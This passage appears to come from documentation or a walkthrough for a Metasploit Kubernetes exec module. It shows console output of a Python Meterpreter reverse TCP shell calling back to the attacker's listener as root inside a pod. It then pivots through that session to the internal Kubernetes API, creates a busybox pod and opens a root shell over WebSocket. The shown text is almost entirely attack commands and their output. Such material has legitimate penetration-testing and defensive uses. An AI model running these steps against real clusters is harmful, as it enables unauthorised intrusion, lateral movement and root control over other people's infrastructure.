PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/kubernetes/exec) > run
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Sending stage (39736 bytes) to 192.168.159.31
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.31:59234) at 2021-10-01 09:55:00 -0400
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : thinkphp-67f7c88cc9-tgpfh
OS           : Linux 5.4.0-88-generic #99-Ubuntu SMP Thu Sep 23 17:29:00 UTC 2021
Architecture : x64
Meterpreter  : python/linux
meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/kubernetes/exec) >
```

Next, the compromised session is used to access the internal Kubernetes endpoint, create a new pod and open a shell
directly via a WebSocket.

```
msf6 exploit(multi/kubernetes/exec) > set TARGET Interactive\ WebSocket
TARGET => Interactive WebSocket
msf6 exploit(multi/kubernetes/exec) > run RHOST="" RPORT="" POD="" SESSION=-1
[*] Routing traffic through session: 1
[+] Kubernetes service host: 10.96.0.1:443
[*] Using image: busybox
[+] Pod created: burhgvzc
[*] Waiting for the pod to be ready...
[*] Found shell.
[*] Command shell session 2 opened (172.17.0.31:59437 -> 10.96.0.1:443) at 2021-10-01 10:05:57 -0400
id
uid=0(root) gid=0(root) groups=10(wheel)
pwd
/
```

